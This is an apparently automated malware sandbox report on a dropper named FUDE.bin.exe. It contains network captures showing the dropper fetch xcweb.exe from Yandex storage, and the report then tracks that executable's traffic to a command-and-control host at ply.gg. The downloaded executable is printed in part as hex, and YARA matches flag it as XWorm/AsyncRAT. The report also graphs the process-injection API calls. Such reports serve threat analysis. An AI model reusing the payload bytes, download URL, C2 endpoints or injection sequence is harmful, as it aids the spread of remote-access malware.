                                  Aug 4, 2024 12:56:27.326885939 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:27.351468086 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:27.356385946 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:27.398205042 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:27.403059006 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:27.609237909 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:27.611773968 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:27.616695881 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:27.797135115 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:27.800133944 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:27.805183887 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:27.981271982 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:27.983360052 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:27.988280058 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:32.929533005 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:32.934544086 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:33.212681055 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:33.214550972 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:33.219439030 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:37.523417950 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:37.528325081 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:37.539700985 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:37.544611931 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:37.585968971 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:37.591013908 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:37.804639101 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:37.811232090 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:37.816256046 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:37.992711067 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:37.997140884 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:38.004571915 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:38.178134918 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:38.185121059 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:38.190084934 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:40.321137905 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:40.326163054 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:40.617285967 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:40.620856047 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:40.625813961 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:42.836008072 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:42.841008902 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:42.851377964 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:42.856164932 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:42.976372004 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:42.981156111 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:42.992001057 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:42.996738911 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:43.007602930 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:43.012391090 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:43.038878918 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:43.043682098 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:43.054802895 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:43.059808969 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:43.124106884 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:43.130007982 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:43.134929895 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:43.134974957 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:43.139811039 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:43.179750919 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:43.185336113 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:43.323131084 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:43.324630022 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:43.329386950 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:43.507143974 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:43.508505106 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:43.839199066 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:44.226285934 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:44.555483103 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:44.555497885 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:44.555684090 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:44.556183100 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:44.556603909 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:44.556647062 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:44.558188915 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:44.558198929 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:44.558206081 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:44.559272051 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:44.584388971 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:44.589273930 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:44.589653969 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:44.594433069 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:44.878535032 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:44.891783953 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:44.896620035 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:52.273436069 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:52.278390884 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:52.577939987 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:52.584379911 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:52.589232922 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:53.538641930 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:53.540849924 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:53.540904999 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:53.773518085 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:53.778466940 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:54.074225903 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:54.076313972 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:54.081300020 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:58.573249102 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:58.578218937 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:58.865909100 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:58.871561050 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:58.876430035 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:58.929610014 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:58.934367895 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:59.023345947 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:59.028187990 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:59.038955927 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:59.043906927 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:59.070148945 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:59.075280905 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:59.408659935 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:59.409663916 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:59.414458036 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:59.662579060 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:59.663341045 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:59.670039892 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:56:59.670078993 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:56:59.674941063 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:57:00.133173943 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:57:00.138868093 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:57:00.429641008 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:57:00.437174082 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:57:00.442039013 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:57:05.898272038 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:57:05.903337955 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:57:06.184541941 CEST3912949733147.185.221.17192.168.2.4
                                  Aug 4, 2024 12:57:06.185868979 CEST4973339129192.168.2.4147.185.221.17
                                  Aug 4, 2024 12:57:06.190689087 CEST3912949733147.185.221.17192.168.2.4
                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 4, 2024 12:52:58.407352924 CEST6484153192.168.2.41.1.1.1
                                  Aug 4, 2024 12:52:58.443571091 CEST53648411.1.1.1192.168.2.4
                                  Aug 4, 2024 12:53:08.099380970 CEST6455953192.168.2.41.1.1.1
                                  Aug 4, 2024 12:53:08.133095026 CEST53645591.1.1.1192.168.2.4
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Aug 4, 2024 12:52:58.407352924 CEST192.168.2.41.1.1.10xa9e6Standard query (0)s355vlx.storage.yandex.netA (IP address)IN (0x0001)false
                                  Aug 4, 2024 12:53:08.099380970 CEST192.168.2.41.1.1.10x4843Standard query (0)ads-jeremy.gl.at.ply.ggA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Aug 4, 2024 12:52:58.443571091 CEST1.1.1.1192.168.2.40xa9e6No error (0)s355vlx.storage.yandex.net5.45.238.155A (IP address)IN (0x0001)false
                                  Aug 4, 2024 12:53:08.133095026 CEST1.1.1.1192.168.2.40x4843No error (0)ads-jeremy.gl.at.ply.gg147.185.221.17A (IP address)IN (0x0001)false
                                  • s355vlx.storage.yandex.net
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.4497305.45.238.155803084C:\Users\user\Desktop\FUDE.bin.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 4, 2024 12:52:58.456079006 CEST734OUTGET /rdisk/a2dca1babaa95e6be61bb81085ada861493d1dda8cfacd1d9055fd0be821e96b/66af8c32/AiwRdOOLiCrkwWShBhcRfBv66wdV_gWAlrktMbpOi7EPEHHuUDDgYy0_mv6esa-xg8RAhDBKCZL5h5sBq8Fb4w==?uid=0&filename=xcweb.exe&disposition=attachment&hash=HqgB2usPumPowCfFVqsCvy%2BR6Xnj%2BKgdMRlicFj1Jpw3VwaT47lG5dSCsMa3WnKmq/J6bpmRyOJonT3VoXnDag%3D%3D&limit=0&content_type=application%2Fx-dosexec&owner_uid=1425898286&fsize=33280&hid=2a700e71c2af2dc9615f16632c865451&media_type=executable&tknv=v2&ts=61edc24f5f080&s=f9c98e348785dccf7ddd4c1ac9efee6f2007fa91d8871ab0e4447b34248bfafb&pb=U2FsdGVkX1-5hsS7H2xAWpYocjMKREeX7oisuiFsZmtN3VlwKpxAkVWcvjdgtCOv1pWfi3zxnvfJtU6seQHLVUNQupWbg-u7Fz1wzLTPUO8 HTTP/1.1
                                  Host: s355vlx.storage.yandex.net
                                  Connection: Keep-Alive
                                  Aug 4, 2024 12:52:59.216367960 CEST1236INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Sun, 04 Aug 2024 10:52:59 GMT
                                  Content-Type: application/x-dosexec
                                  Content-Length: 33280
                                  Connection: keep-alive
                                  Keep-Alive: timeout=60
                                  Last-Modified: Sun, 04 Aug 2024 10:11:37 GMT
                                  Accept-Ranges: bytes
                                  X-Data-Size: 33280
                                  X-Mds-Request-Id: 32720597c0e42783
                                  X-MDS-TVM-ERROR: missing
                                  X-Content-Type-Options: nosniff
                                  Access-Control-Allow-Origin: *
                                  Content-Disposition: attachment;
                                  X-Content-Type-Options: nosniff
                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c8 53 af 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 78 00 00 00 08 00 00 00 00 00 00 3e 97 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 96 00 00 4f 00 00 00 00 a0 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELSfx> @ @O H.textDw x `.rsrcz@@.reloc@B HO`G(*(*ssss*0~o+*0~o+*0~o+*0~o+*0
                                  Aug 4, 2024 12:52:59.216389894 CEST224INData Raw: 00 11 02 03 28 11 00 00 0a 28 12 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 13 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 14 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00
                                  Data Ascii: ((+*0(+*0(+*0(+*0-(++++*0*(*0 ~-(+~+*(*0
                                  Aug 4, 2024 12:52:59.216458082 CEST1236INData Raw: 01 00 4d 00 00 00 00 00 00 00 72 01 00 00 70 80 06 00 00 04 72 84 00 00 70 80 08 00 00 04 72 b6 00 00 70 80 09 00 00 04 72 e8 00 00 70 80 0a 00 00 04 19 80 0b 00 00 04 72 1a 01 00 70 80 0c 00 00 04 72 4c 01 00 70 80 0d 00 00 04 72 7e 01 00 70 80
                                  Data Ascii: MrprprprprprLpr~p*(*(*0~ (~(?( ~(?( ~(?( ~(?( ~(?( ~(?
                                  Aug 4, 2024 12:52:59.216496944 CEST1236INData Raw: 43 00 00 0a 0c 12 02 28 44 00 00 0a 72 e2 01 00 70 72 ee 01 00 70 6f 3f 00 00 0a 72 fa 01 00 70 72 04 02 00 70 6f 3f 00 00 0a a2 09 1f 09 7e 17 00 00 04 28 11 00 00 0a a2 09 1f 0a 7e 0c 00 00 04 a2 09 1f 0b 7e 17 00 00 04 28 11 00 00 0a a2 09 1f
                                  Data Ascii: C(Drprpo?rprpo?~(~~((~((~((~((78~((!~(( ~(("~(
                                  Aug 4, 2024 12:52:59.216512918 CEST355INData Raw: 1a 08 6f 5a 00 00 0a 1a da 6f 68 00 00 0a 72 7c 03 00 70 28 42 00 00 0a 0c 2b 39 07 20 00 00 10 00 6a 31 30 07 6c 23 00 00 00 00 00 00 30 41 5b 13 04 12 04 28 67 00 00 0a 0c 08 1a 08 6f 5a 00 00 0a 1a da 6f 68 00 00 0a 72 84 03 00 70 28 42 00 00
                                  Data Ascii: oZohr|p(B+9 j10l#0A[(goZohrp(B%(!r$p(#(#*$0~-8~oi>V~j@~@~oj(L(k~ols2
                                  Aug 4, 2024 12:52:59.216521025 CEST1236INData Raw: a2 00 00 00 7e 13 00 00 04 7e 12 00 00 04 16 06 6f 6e 00 00 0a 7e 13 00 00 04 6f 6f 00 00 0a 7e 11 00 00 04 33 60 14 fe 06 2b 00 00 06 73 70 00 00 0a 73 71 00 00 0a 0b 07 14 72 8c 03 00 70 17 8d 03 00 00 01 0d 09 16 7e 13 00 00 04 6f 6a 00 00 0a
                                  Data Ascii: ~~on~oo~3`+spsqrp~oj(r&j~ols23+ ~~ooj3+G~~~#s7~o8&%(!(#(#
                                  Aug 4, 2024 12:52:59.216535091 CEST1236INData Raw: 00 00 0a 28 4f 00 00 0a 28 25 00 00 06 16 80 19 00 00 04 38 b4 06 00 00 11 13 72 b2 03 00 70 16 28 4a 00 00 0a 16 33 15 28 56 00 00 06 28 81 00 00 0a 16 28 22 00 00 0a 38 8f 06 00 00 11 13 72 ba 03 00 70 16 28 4a 00 00 0a 16 33 20 7e 10 00 00 04
                                  Data Ascii: (O(%8rp(J3(V(("8rp(J3 ~o~o|("8_rp(J3(=8Brp(J3((Q(=8rp(J3((Q(88rp(J3(
                                  Aug 4, 2024 12:52:59.216552019 CEST1236INData Raw: 9a 28 50 00 00 06 2d 23 72 fe 05 00 70 7e 1b 00 00 04 28 60 00 00 0a 06 17 9a 28 60 00 00 0a 28 20 00 00 0a 28 25 00 00 06 2b 12 06 17 9a 28 50 00 00 06 28 51 00 00 06 28 2f 00 00 06 38 b6 01 00 00 11 13 72 14 06 00 70 16 28 4a 00 00 0a 16 33 26
                                  Data Ascii: (P-#rp~(`(`( (%+(P(Q(/8rp(J3&((O&(Q(/8r*p(J3r@p(18arzp(J@N(o(o(( s(oo
                                  Aug 4, 2024 12:52:59.216620922 CEST1236INData Raw: 00 0a 28 20 00 00 0a 0c 08 72 24 02 00 70 6f ab 00 00 0a 2c 08 08 28 31 00 00 06 2b 06 08 28 30 00 00 06 dd 24 03 00 00 38 d8 02 00 00 07 14 72 0e 03 00 70 16 8d 03 00 00 01 14 14 14 28 a8 00 00 0a 72 f2 06 00 70 16 28 a9 00 00 0a 2c 66 7e 1c 00
                                  Data Ascii: ( r$po,(1+(0$8rp(rp(,f~(,Nrp~~((Q(r&8Prp(rp(,Urp
                                  Aug 4, 2024 12:52:59.216644049 CEST696INData Raw: 28 21 00 00 0a 13 06 28 23 00 00 0a de 00 2a 01 10 00 00 00 00 00 00 c4 c4 00 0f 24 00 00 01 13 30 08 00 e3 00 00 00 22 00 00 11 73 b3 00 00 0a 0c 02 72 b8 02 00 70 15 16 28 80 00 00 0a 13 05 16 13 04 2b 2c 11 05 11 04 9a 0b 08 07 14 72 54 07 00
                                  Data Ascii: (!(#*$0"srp(+,rTp(( o28(+`o(,+Eoo%s(+,&1!rdpoorrp(O(0
                                  Aug 4, 2024 12:52:59.221581936 CEST1236INData Raw: 14 00 00 0a 72 8c 03 00 70 17 8d 03 00 00 01 0d 09 16 06 28 11 00 00 0a a2 09 13 04 11 04 14 14 17 8d 38 00 00 01 13 05 11 05 16 17 9c 11 05 17 28 72 00 00 0a 26 11 05 16 90 2c 0a 11 04 16 9a 28 11 00 00 0a 0a 2a 1b 30 03 00 5d 00 00 00 26 00 00
                                  Data Ascii: rp(8(r&,(*0]&(oooo(o3(o&%(!(#*LL$:( (2+*:( (3+*0's


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:06:52:57
                                  Start date:04/08/2024
                                  Path:C:\Users\user\Desktop\FUDE.bin.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\FUDE.bin.exe"
                                  Imagebase:0xf90000
                                  File size:9'728 bytes
                                  MD5 hash:36A75D896D48D43A54A8792FD92F3912
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:06:52:57
                                  Start date:04/08/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:06:52:59
                                  Start date:04/08/2024
                                  Path:C:\Users\user\AppData\Local\Temp\file.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Local\Temp\file.exe"
                                  Imagebase:0xc40000
                                  File size:33'280 bytes
                                  MD5 hash:91A0CE504DBB22915734E1A3F3C76533
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1687708875.0000000000C42000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1687708875.0000000000C42000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.4142868111.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: Joe Security
                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: ditekSHen
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 66%, Virustotal, Browse
                                  Reputation:low
                                  Has exited:false

                                  Target ID:3
                                  Start time:06:52:59
                                  Start date:04/08/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Explorer.EXE
                                  Imagebase:0x7ff72b770000
                                  File size:5'141'208 bytes
                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:10.9%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:25.9%
                                    Total number of Nodes:27
                                    Total number of Limit Nodes:2
                                    execution_graph 953 18e19aa 954 18e19af WriteProcessMemory 953->954 955 18e1938 953->955 960 18e1a4c 954->960 956 18e193c VirtualAllocEx 955->956 957 18e18c7 955->957 958 18e1972 956->958 961 18e1d88 962 18e1dd0 CreateRemoteThread 961->962 963 18e1e13 962->963 977 18e18f8 978 18e193b VirtualAllocEx 977->978 979 18e1972 978->979 972 18e1a84 973 18e1a18 WriteProcessMemory 972->973 976 18e1a8f 972->976 975 18e1a4c 973->975 964 18e1d80 965 18e1d88 CreateRemoteThread 964->965 967 18e1e13 965->967 968 18e19b0 969 18e19fb WriteProcessMemory 968->969 971 18e1a4c 969->971 980 18e18f0 981 18e18f7 VirtualAllocEx 980->981 984 18e1805 980->984 983 18e1972 981->983

                                    Control-flow Graph

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 018E1963
                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 018E1A3D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707185381.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_FUDE.jbxd
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 44ce65ae86e684f956ea91cc5b976a410b068714a2fa5a3d25d4678e65d30d3a
                                    • Instruction ID: 6ae9f4d76679f3124d43815769873ec7838abf8505ef973ef195239353caa564
                                    • Opcode Fuzzy Hash: 44ce65ae86e684f956ea91cc5b976a410b068714a2fa5a3d25d4678e65d30d3a
                                    • Instruction Fuzzy Hash: 9F4136B69002089FDB10DF99D848BDEFBF5FF89320F10842AE558A7210C3799A55CFA0

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707185381.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_FUDE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a5fdbb391b68c262aa8580122b090fa148d7ac90db32ed9f6b0d36b8ef79e013
                                    • Instruction ID: 13bba10bf2681f19a80cc9c1bd34675ab688b84ebd2ce4bcb0e57bf32d2b76eb
                                    • Opcode Fuzzy Hash: a5fdbb391b68c262aa8580122b090fa148d7ac90db32ed9f6b0d36b8ef79e013
                                    • Instruction Fuzzy Hash: 0551A3347402269BD716AB38D95CB7F72EAABCAF04F00406DD506DB6A0DE799E01C7C6

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 17 18e1a84-18e1a8d 18 18e1a8f-18e1aef 17->18 19 18e1a18-18e1a20 17->19 24 18e1b43-18e1b8f 18->24 25 18e1af1-18e1b16 18->25 22 18e1a2a-18e1a4a WriteProcessMemory 19->22 23 18e1a22-18e1a28 19->23 26 18e1a4c-18e1a52 22->26 27 18e1a53-18e1a7b 22->27 23->22 38 18e1b98-18e1bd0 24->38 39 18e1b91-18e1b97 24->39 25->24 30 18e1b18-18e1b1a 25->30 26->27 33 18e1b1c-18e1b26 30->33 34 18e1b3d-18e1b40 30->34 36 18e1b2a-18e1b39 33->36 37 18e1b28 33->37 34->24 36->36 40 18e1b3b 36->40 37->36 44 18e1bd2-18e1bd6 38->44 45 18e1be0 38->45 39->38 40->34 44->45 46 18e1bd8-18e1bdb call 18e0148 44->46 48 18e1be1 45->48 46->45 48->48
                                    APIs
                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 018E1A3D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707185381.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_FUDE.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 1a6d88c85df2f28509a6a5542be064fd96d9348e736f4f992dd1c2970e97daba
                                    • Instruction ID: 75e04e2274dc8ae61767df046bb59deea3bad8335c48811afeb95ba7cdfb1fb6
                                    • Opcode Fuzzy Hash: 1a6d88c85df2f28509a6a5542be064fd96d9348e736f4f992dd1c2970e97daba
                                    • Instruction Fuzzy Hash: 555179B1D102589FDB20CFA9C848BDEBBF1EF89314F14812AE854E7291E7749945CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
